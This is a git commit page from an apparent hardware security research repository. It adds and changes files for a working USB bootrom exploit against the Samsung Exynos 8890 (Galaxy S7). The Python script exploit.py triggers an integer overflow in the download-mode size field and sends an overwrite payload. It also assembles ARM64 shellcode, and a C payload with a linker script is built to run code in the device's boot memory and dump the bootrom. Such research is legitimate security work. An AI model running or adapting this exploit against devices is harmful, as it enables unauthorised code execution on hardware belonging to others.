found another bug
This commit is contained in:
parent
d7a740d173
commit
a9def4a27d
17
Makefile
Normal file
17
Makefile
Normal file
@ -0,0 +1,17 @@
|
|||||||
|
ifeq ($(ANDROID_NDK_ROOT),)
|
||||||
|
$(error Error : Set the env variable 'ANDROID_NDK_ROOT' with the path of the Android NDK (version 20))
|
||||||
|
endif
|
||||||
|
|
||||||
|
CC := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android27-clang
|
||||||
|
AR := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ar
|
||||||
|
OBJCOPY := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-objcopy
|
||||||
|
LD := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ld.bfd
|
||||||
|
|
||||||
|
#==================Target Samsung S7 (8890)==================
|
||||||
|
CFLAGS_SAMSUNGS7 = -Os
|
||||||
|
|
||||||
|
dwc3:
|
||||||
|
$(CC) entry.S -c -o entry.o $(CFLAGS_SAMSUNGS7)
|
||||||
|
$(CC) $(CFLAGS_SAMSUNGS7) -c test_dwc3.c -o dwc3.o
|
||||||
|
$(LD) -T test_dwc3.ld entry.o dwc3.o -o dwc3.elf --just-symbols=symbols.txt
|
||||||
|
$(OBJCOPY) -O binary dwc3.elf dwc3.bin
|
146
exploit.py
146
exploit.py
@ -1,6 +1,8 @@
|
|||||||
import usb.core
|
import usb.core
|
||||||
import usb.util
|
import usb.util
|
||||||
import struct, sys, usb1, libusb1, ctypes
|
import struct, sys, usb1, libusb1, ctypes, usb
|
||||||
|
from keystone import *
|
||||||
|
from capstone import *
|
||||||
# from ghidra_assistant.utils.utils import *
|
# from ghidra_assistant.utils.utils import *
|
||||||
|
|
||||||
def p32(x):
|
def p32(x):
|
||||||
@ -73,6 +75,26 @@ class ExynosDevice():
|
|||||||
assert(res == 0)
|
assert(res == 0)
|
||||||
return transfered
|
return transfered
|
||||||
|
|
||||||
|
def test_bug_2(self):
|
||||||
|
# Also bug here
|
||||||
|
# payload = p32(1) + p32(CHUNK_SIZE + 0x2001) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
|
||||||
|
# self.write(payload, MAX_PAYLOAD_SIZE)
|
||||||
|
# self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
|
||||||
|
|
||||||
|
transferred = ctypes.c_int()
|
||||||
|
bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
|
||||||
|
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
|
||||||
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
|
||||||
|
assert res == 0
|
||||||
|
|
||||||
|
payload = b"\xaa" * 0x200
|
||||||
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
||||||
|
assert res == 0
|
||||||
|
|
||||||
|
payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200))
|
||||||
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
||||||
|
pass
|
||||||
|
|
||||||
def test_bug(self):
|
def test_bug(self):
|
||||||
# Start by sending a valid packet
|
# Start by sending a valid packet
|
||||||
# Integer overflow in the size field
|
# Integer overflow in the size field
|
||||||
@ -109,11 +131,6 @@ class ExynosDevice():
|
|||||||
assert transferred.value == len(bug_payload), "Invalid transfered size"
|
assert transferred.value == len(bug_payload), "Invalid transfered size"
|
||||||
current_offset += len(bug_payload) - 8 # Remove header
|
current_offset += len(bug_payload) - 8 # Remove header
|
||||||
|
|
||||||
# Send the actual payload
|
|
||||||
# res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
|
||||||
# assert res == 0, "Error sending payload"
|
|
||||||
# current_offset += len(payload)
|
|
||||||
|
|
||||||
cnt = 0
|
cnt = 0
|
||||||
while True:
|
while True:
|
||||||
if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
|
if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
|
||||||
@ -138,18 +155,129 @@ class ExynosDevice():
|
|||||||
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
|
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
|
||||||
transferred = ctypes.c_int(0)
|
transferred = ctypes.c_int(0)
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
|
||||||
# assert transferred.value == len(rop_chain), "Error sending ROP chain"
|
assert res == 0, "Error sending ROP chain"
|
||||||
|
|
||||||
buf = ctypes.c_buffer(b"", 0x200000)
|
# Send some data
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
|
p = b"\xaa" * 0x200
|
||||||
|
transferred.value = 0
|
||||||
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
|
||||||
|
|
||||||
|
buf = ctypes.c_buffer(b"", 0x20000)
|
||||||
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)
|
||||||
|
|
||||||
|
# Should have received some bytes
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
|
||||||
|
def usb_debug():
|
||||||
|
shellcode = f"""
|
||||||
|
start:
|
||||||
|
adr x0, test_fun
|
||||||
|
ldr x0, [x0]
|
||||||
|
blr x0
|
||||||
|
|
||||||
|
mov w1, #0x20000 // size
|
||||||
|
mov w0, #0x0 // address
|
||||||
|
bl usb_send
|
||||||
|
mov x0, #0
|
||||||
|
br x0 //reset
|
||||||
|
|
||||||
|
#Setup read usb
|
||||||
|
mov w0, #0x2
|
||||||
|
adr x1, shellcode_base
|
||||||
|
ldr x1, [x1]
|
||||||
|
mov w2, #0x02020000
|
||||||
|
add w2, w2, #0x2000
|
||||||
|
# endpoint, cb, buffer
|
||||||
|
adr x5, maybe_usb_setup_read
|
||||||
|
ldr x5, [x5]
|
||||||
|
blr x5
|
||||||
|
|
||||||
|
|
||||||
|
# Get something?? arg0 is endpoint
|
||||||
|
mov w0, #0x2
|
||||||
|
adr x1, maybe_read_size_endpoint
|
||||||
|
ldr x1, [x1]
|
||||||
|
blr x1
|
||||||
|
|
||||||
|
|
||||||
|
# # Send some data from ROM
|
||||||
|
# mov w1, #0x200 // size
|
||||||
|
# mov w0, #0x0 // address
|
||||||
|
# bl usb_send
|
||||||
|
# mov x0, #0
|
||||||
|
# br x0 //reset
|
||||||
|
|
||||||
|
|
||||||
|
# # dwc3_ep0_start_trans
|
||||||
|
# mov w1, w0
|
||||||
|
# mov w0, #0x2
|
||||||
|
# mov w2, #0x200
|
||||||
|
# adr x5, dwc3_ep0_start_trans
|
||||||
|
# ldr x5, [x5]
|
||||||
|
# blr x5
|
||||||
|
|
||||||
|
# # Send some data from ROM
|
||||||
|
# mov w1, #0x200 // size
|
||||||
|
# mov w0, #0x0 // address
|
||||||
|
# bl usb_send
|
||||||
|
# mov x0, #0
|
||||||
|
# br x0 //reset
|
||||||
|
|
||||||
|
usb_send:
|
||||||
|
stp x29, x30, [sp,#-48]!
|
||||||
|
mov w3, #0x0
|
||||||
|
bfxil w3, w1, #0, #24
|
||||||
|
mov w1, #0xc12
|
||||||
|
mov x29, sp
|
||||||
|
stp x19, x20, [sp,#16]
|
||||||
|
mov x5, #0xc834
|
||||||
|
mov w20, #0x1
|
||||||
|
movk x5, #0x1540, lsl #16
|
||||||
|
ldr x2, [x29,#40]
|
||||||
|
mov x4, #0xc838
|
||||||
|
orr w6, w1, w20
|
||||||
|
movk x4, #0x1540, lsl #16
|
||||||
|
mov x19, #0xc83c
|
||||||
|
movk x19, #0x1540, lsl #16
|
||||||
|
stp w3, w1, [x2,#8]
|
||||||
|
mov w3, #0x406
|
||||||
|
stp w0, wzr, [x2]
|
||||||
|
mov w0, w20
|
||||||
|
ldr x1, [x29,#40]
|
||||||
|
strb w6, [x2,#12]
|
||||||
|
mov x2, #0x27c8
|
||||||
|
str w1, [x5]
|
||||||
|
mov w1, #0x1388
|
||||||
|
str wzr, [x4]
|
||||||
|
str w3, [x19]
|
||||||
|
blr x2
|
||||||
|
mov w0, w20
|
||||||
|
ldr w1, [x19]
|
||||||
|
ldp x19, x20, [sp,#16]
|
||||||
|
ldp x29, x30, [sp],#48
|
||||||
|
ret
|
||||||
|
|
||||||
|
usb_read_endpoint: .quad 0x00006654
|
||||||
|
maybe_usb_setup_read: .quad 0x00006f88
|
||||||
|
shellcode_base: .quad 0x02021800
|
||||||
|
maybe_read_size_endpoint: .quad 0x00007a7c
|
||||||
|
dwc3_ep0_start_trans: .quad 0x0000791c
|
||||||
|
test_fun: .quad 0x000064e0
|
||||||
|
"""
|
||||||
|
shellcode = ks.asm(shellcode, as_bytes=True)[0]
|
||||||
|
|
||||||
|
shellcode = open("dwc3.bin", "rb").read()
|
||||||
|
|
||||||
|
exynos = ExynosDevice()
|
||||||
|
exynos.exploit(shellcode)
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
|
usb_debug()
|
||||||
|
sys.exit(0)
|
||||||
# wait_for_device()
|
# wait_for_device()
|
||||||
exynos = ExynosDevice()
|
exynos = ExynosDevice()
|
||||||
|
exynos.test_bug_2()
|
||||||
path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
|
path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
|
||||||
# path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
|
# path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
|
||||||
exynos.exploit(open(path, "rb").read())
|
exynos.exploit(open(path, "rb").read())
|
||||||
|
5
symbols.txt
Normal file
5
symbols.txt
Normal file
@ -0,0 +1,5 @@
|
|||||||
|
maybe_usb_setup_read = 0x00006f88;
|
||||||
|
dwc3_ep0_start_trans = 0x0000791c;
|
||||||
|
usb_event_handler = 0x00007bac;
|
||||||
|
get_endpoint_buffer = 0x00007a7c;
|
||||||
|
sleep = 0x000027c8;
|
57
test_dwc3.c
Normal file
57
test_dwc3.c
Normal file
@ -0,0 +1,57 @@
|
|||||||
|
#include <stdint.h>
|
||||||
|
|
||||||
|
// Create external function at 0x00006f88
|
||||||
|
extern void maybe_usb_setup_read(char endpoint,void *fun,uint32_t target_buffer);
|
||||||
|
extern void dwc3_ep0_start_trans(char endpoint,uint32_t target_buf, uint32_t len);
|
||||||
|
extern int usb_event_handler(void);
|
||||||
|
extern void * get_endpoint_buffer(char endpoint);
|
||||||
|
extern void sleep(int endpoint,uint32_t timeout);
|
||||||
|
|
||||||
|
#define recv_buffer 0x02021800 + 0x2000
|
||||||
|
#define data_received 0x02021800 + 0x2004
|
||||||
|
|
||||||
|
// do {
|
||||||
|
// /* loops until image has been received */
|
||||||
|
// usb_event_handler();
|
||||||
|
// iVar2 = download_ready?(); #TODO, set some global to indicate readyness
|
||||||
|
// } while (iVar2 == 0);
|
||||||
|
|
||||||
|
void recv_data_cb(uint32_t endpoint, uint32_t len){
|
||||||
|
void *rbuf;
|
||||||
|
void *dest_buf = (void *)recv_buffer;
|
||||||
|
volatile void *dref = (void *)data_received;
|
||||||
|
|
||||||
|
for(int i= 0; i < len; i++){
|
||||||
|
rbuf = get_endpoint_buffer(2);
|
||||||
|
*(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
|
||||||
|
}
|
||||||
|
// while(1){}
|
||||||
|
// asm("mov x0, #0x0");
|
||||||
|
// asm("br x0");
|
||||||
|
*(uint8_t *)dref = 3;
|
||||||
|
}
|
||||||
|
|
||||||
|
void recv_data(){
|
||||||
|
// Set data_received to 0
|
||||||
|
// uint32_t *r = (uint32_t *) data_received;
|
||||||
|
// r = 0;
|
||||||
|
volatile void *dref = (void *)data_received;
|
||||||
|
*(uint8_t *)dref = 0;
|
||||||
|
|
||||||
|
maybe_usb_setup_read(2, recv_data_cb, 1);
|
||||||
|
while(1){
|
||||||
|
usb_event_handler();
|
||||||
|
if(*(uint8_t *)dref == 3){
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
sleep(1, 10);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
recv_data();
|
||||||
|
// recv_data();
|
||||||
|
// sleep(1, 5000);
|
||||||
|
asm("mov x0, #0x0");
|
||||||
|
asm("br x0");
|
||||||
|
}
|
14
test_dwc3.ld
Normal file
14
test_dwc3.ld
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
MEMORY {
|
||||||
|
ROM (rwx): ORIGIN = 0x02021800, LENGTH = 0x1000
|
||||||
|
}
|
||||||
|
|
||||||
|
SECTIONS
|
||||||
|
{
|
||||||
|
. = 0x02021800;
|
||||||
|
.text . : {
|
||||||
|
*(.text*)
|
||||||
|
*(.data*)
|
||||||
|
*(.rodata*)
|
||||||
|
} >ROM
|
||||||
|
|
||||||
|
}
|
Loading…
Reference in New Issue
Block a user